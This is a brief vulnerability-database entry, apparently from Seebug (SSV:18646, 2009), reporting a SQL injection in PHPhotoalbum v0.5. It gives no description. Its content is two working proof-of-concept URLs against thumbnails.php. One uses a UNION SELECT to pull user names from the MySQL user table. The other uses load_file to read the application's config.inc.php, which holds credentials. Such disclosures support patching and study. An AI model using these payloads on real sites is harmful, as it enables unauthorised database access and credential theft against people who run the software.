PHPhotoalbum v0.5 SQL Injection Vulnerability

2009-12-21T00:00:00
ID SSV:18646
Type seebug
Reporter Root
Modified 2009-12-21T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows

http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--



http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--